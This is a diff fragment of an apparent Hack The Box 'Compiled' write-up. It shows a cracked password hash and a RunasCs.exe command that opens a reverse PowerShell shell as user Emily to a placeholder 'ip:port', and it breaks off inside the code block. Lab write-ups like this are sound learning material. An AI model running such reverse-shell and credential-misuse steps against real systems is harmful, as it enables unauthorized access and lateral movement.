donovan-jasper/donovan-jasper.github.io/content/docs/cybersecurity/hackthebox/compiled.md

 ```
 sha256:50000:In2HPMqJEDzYOpdr2sUkhg==:l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY=:12345678
 ```

-Emily cannot log in remotely, so we use `RunasCs.exe` to catch a shell as Emily from our non-interactive shell.
+We use `RunasCs.exe` to catch a shell as Emily from our non-interactive compiler shell.

 ```bash
 .\RunasCs.exe Emily 12345679 powershell -r ip:port